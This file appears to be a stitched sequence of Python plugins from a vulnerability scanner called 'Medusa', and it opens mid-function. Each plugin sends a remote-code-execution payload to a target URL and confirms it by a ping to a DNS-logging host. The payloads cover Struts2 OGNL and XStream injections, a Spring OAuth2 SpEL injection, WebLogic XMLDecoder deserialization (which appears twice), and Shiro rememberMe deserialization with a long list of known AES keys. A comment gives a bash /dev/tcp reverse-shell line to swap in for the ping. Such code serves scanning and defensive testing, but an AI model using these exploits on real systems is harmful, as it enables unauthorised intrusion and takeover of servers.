Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2019-17564)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(url,DL.dns_text(),DL.dns_host(),con)
print(Medusa)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL=Dnslog()
con=""
payload="""%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(DL.dns_host())
try:
payload_url = url+payload
try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port,path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL=Dnslog()
con=""
data="""<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>ping</string>
<string>{}</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>""".format(DL.dns_host())
try:
payload_url = scheme + "://" + url +":"+ str(port)+path
try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,headers=Headers,data=data, timeout=6,proxies=proxies, verify=False)
con = resp.text
except:
pass
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-052)\r\n漏洞详情:\r\n版本号:S2-052\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,data,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
DL=Dnslog()
payload ="/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host())
payload_url = url + payload
resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL = Dnslog()
#<string>bash -i >& /dev/tcp/10.0.0.1/21 0>&1</string>反弹shell,替换ping位置数据
linux_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(DL.dns_host())
windows_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>C:\Windows\System32\cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''.format(DL.dns_host())
for data in [linux_data, windows_data]:
try:
payload = '/wls-wsat/CoordinatorPortType'
payload_url = url+ payload
Headers["Content-Type"]="text/xml"
resp = requests.post(payload_url,headers=Headers,data=data, proxies=proxies, timeout=6, verify=False)
con = resp.text
time.sleep(4)
if DL.result():
Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(url, payload_url,data, con,DL.dns_text(),DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
ExpClass = "JRMPClient"
CipherKey = [
"kPH+bIxk5D2deZiIxcaaaA==",
"2AvVhdsgUs0FSA3SDFAdag==",
"3AvVhmFLUs0KTA3Kprsdag==",
"4AvVhmFLUs0KTA3Kprsdag==",
"5AvVhmFLUs0KTA3Kprsdag==",
"5aaC5qKm5oqA5pyvAAAAAA==",
"6ZmI6I2j5Y+R5aSn5ZOlAA==",
"bWljcm9zAAAAAAAAAAAAAA==",
"wGiHplamyXlVB11UXWol8g==",
"Z3VucwAAAAAAAAAAAAAAAA==",
"MTIzNDU2Nzg5MGFiY2RlZg==",
"U3ByaW5nQmxhZGUAAAAAAA==",
"fCq+/xW488hMTCD+cmJ3aQ==",
"1QWLxg+NYmxraMoxAXu/Iw==",
"ZUdsaGJuSmxibVI2ZHc9PQ==",
"L7RioUULEFhRyxM7a2R/Yg==",
"r0e3c16IdVkouZgk1TKVMg==",
"bWluZS1hc3NldC1rZXk6QQ==",
"a2VlcE9uR29pbmdBbmRGaQ==",
"WcfHGU25gNnTxTlmJMeSpw==",
"OY//C4rhfwNxCQAQCrQQ1Q==",
"5J7bIJIV0LQSN3c9LPitBQ==",
"f/SY5TIve5WWzT4aQlABJA==",
"bya2HkYo57u6fWh5theAWw==",
"WuB+y2gcHRnY2Lg9+Aqmqg==",
"kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
"3qDVdLawoIr1xFd6ietnwg==",
"ZWvohmPdUsAWT3=KpPqda",
"YI1+nBV//m7ELrIyDHm6DQ==",
"6Zm+6I2j5Y+R5aS+5ZOlAA==",
"2A2V+RFLUs+eTA3Kpr+dag==",
"6ZmI6I2j3Y+R1aSn5BOlAA==",
"SkZpbmFsQmxhZGUAAAAAAA==",
"2cVtiE83c4lIrELJwKGJUw==",
"fsHspZw/92PrS3XrPW+vxw==",
"XTx6CKLo/SdSgub+OPHSrw==",
"sHdIjUN6tzhl8xZMG3ULCQ==",
"O4pdf+7e+mZe8NyxMTPJmQ==",
"HWrBltGvEZc14h9VpMvZWw==",
"rPNqM6uKFCyaL10AK51UkQ==",
"Y1JxNSPXVwMkyvES/kJGeQ==",
"lT2UvDUmQwewm6mMoiw4Ig==",
"MPdCMZ9urzEA50JDlDYYDg==",
"xVmmoltfpb8tTceuT5R7Bw==",
"c+3hFGPjbgzGdrC+MHgoRQ==",
"ClLk69oNcA3m+s0jIMIkpg==",
"Bf7MfkNR0axGGptozrebag==",
"1tC/xrDYs8ey+sa3emtiYw==",
"ZmFsYWRvLnh5ei5zaGlybw==",
"cGhyYWNrY3RmREUhfiMkZA==",
"IduElDUpDDXE677ZkhhKnQ==",
"yeAAo1E8BOeAYfBlm4NG9Q==",
"cGljYXMAAAAAAAAAAAAAAA==",
"2itfW92XazYRi5ltW0M2yA==",
"XgGkgqGqYrix9lI6vxcrRw==",
"ertVhmFLUs0KTA3Kprsdag==",
"5AvVhmFLUS0ATA4Kprsdag==",
"s0KTA3mFLUprK4AvVhsdag==",
"hBlzKg78ajaZuTE0VLzDDg==",
"9FvVhtFLUs0KnA3Kprsdyg==",
"d2ViUmVtZW1iZXJNZUtleQ==",
"yNeUgSzL/CfiWw1GALg6Ag==",
"NGk/3cQ6F5/UNPRh8LpMIg==",
"4BvVhmFLUs0KTA3Kprsdag==",
"MzVeSkYyWTI2OFVLZjRzZg==",
"CrownKey==a12d/dakdad",
"empodDEyMwAAAAAAAAAAAA==",
"A7UzJgh1+EWj5oBFi+mSgw==",
"YTM0NZomIzI2OTsmIzM0NTueYQ==",
"c2hpcm9fYmF0aXMzMgAAAA==",
"i45FVt72K2kLgvFrJtoZRw==",
"U3BAbW5nQmxhZGUAAAAAAA==",
"ZnJlc2h6Y24xMjM0NTY3OA==",
"Jt3C93kMR9D5e8QzwfsiMw==",
"MTIzNDU2NzgxMjM0NTY3OA==",
"vXP33AonIp9bFwGl7aT7rA==",
"V2hhdCBUaGUgSGVsbAAAAA==",
"Z3h6eWd4enklMjElMjElMjE=",
"Q01TX0JGTFlLRVlfMjAxOQ==",
"ZAvph3dsQs0FSL3SDFAdag==",
"Is9zJ3pzNh2cgTHB4ua3+Q==",
"NsZXjXVklWPZwOfkvk6kUA==",
"GAevYnznvgNCURavBhCr1w==",
"66v1O8keKNV3TTcGPK1wzg==",
"SDKOLKn2J1j/2BHjeZwAoQ==",
]
BLOCK_SIZE = AES.block_size
PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(
BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
AES_MODE = AES.MODE_CBC
AES_IV = uuid.uuid4().bytes
YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
for key in CipherKey:
try:
DL = Dnslog()
popen = subprocess.Popen(
["java", "-jar", YsoserialPath, ExpClass,
DL.dns_host()],
stdout=subprocess.PIPE)
encryptor = AES.new(base64.b64decode(key), AES_MODE, AES_IV)
file_body = PAD_FUNC(popen.stdout.read())
base64_ciphertext = base64.b64encode(AES_IV +
encryptor.encrypt(file_body))
payload_url = scheme + "://" + url + ":" + str(port)
cookies = {
"jeesite.session.id": "3f8a61ec-27e2-425c-9724-f96ba0c1e512",
"rememberMe": base64_ciphertext.decode()
}
requests.get(payload_url,
cookies=cookies,
proxies=proxies,
timeout=6,
verify=False)
if DL.result():
Medusa = "{}存在ShiroRememberMe反序列化命令执行漏洞(CVE-2016-4437)\r\n验证数据:\r\n漏洞位置:{}\r\n秘钥:{}\r\ncookie:{}\r\nDNSLOG请求值:{}\r\nDNSLOG数据:{}\r\n".format(
url, payload_url, key, cookies, DL.dns_host(),
DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
break
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = Dnslog()
#<string>bash -i >& /dev/tcp/10.0.0.1/21 0>&1</string>反弹shell,替换ping位置数据
linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(DL.dns_host())
windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>C:\Windows\System32\cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''.format(DL.dns_host())
for data in [linux_data, windows_data]:
try:
payload = '/wls-wsat/CoordinatorPortType'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "text/xml",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
time.sleep(4)
if DL.result():
Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(
url, payload_url, data, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port,path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL=Dnslog()
con=""
try:
payload_url = scheme + "://" + url +":"+ str(port)+path
headers = {
'User-Agent': RandomAgent,
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type":"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping "+DL.dns_host()+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}
try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,headers,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL=Dnslog()
con=""
payload="""?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(DL.dns_host())
try:
payload_url = url+payload
try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类